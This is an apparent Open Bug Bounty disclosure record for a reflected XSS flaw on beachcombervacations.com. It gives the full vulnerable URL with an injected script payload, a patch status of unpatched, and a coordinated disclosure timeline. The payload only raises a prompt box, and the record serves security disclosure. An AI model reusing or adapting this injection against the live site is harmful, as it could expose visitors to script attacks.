beachcombervacations.com XSS vulnerability

2017-08-05T14:40:00
ID OBB:276077
Type openbugbounty
Reporter M0r3h4x
Modified 2017-11-03T15:21:00

Description

Vulnerable URL:
https://www.beachcombervacations.com/mls/walkscore.cfm?Street_Number=&Street;_Name=xSS%22;%3C/script%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E&City;=North%20Myrtle%20Beach&state;=SC&zip;_code=29582
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 03.11.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2636434
VIP website status:| No
Check beachcombervacations.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 August, 2017 14:40 GMT
Notification sent to subscribers (without technical details)| 5 August, 2017 18:17 GMT
Generic security notifications sent to website owner| 7 August, 2017 15:21 GMT
Vulnerability details disclosed by researcher| 3 November, 2017 15:21 GMT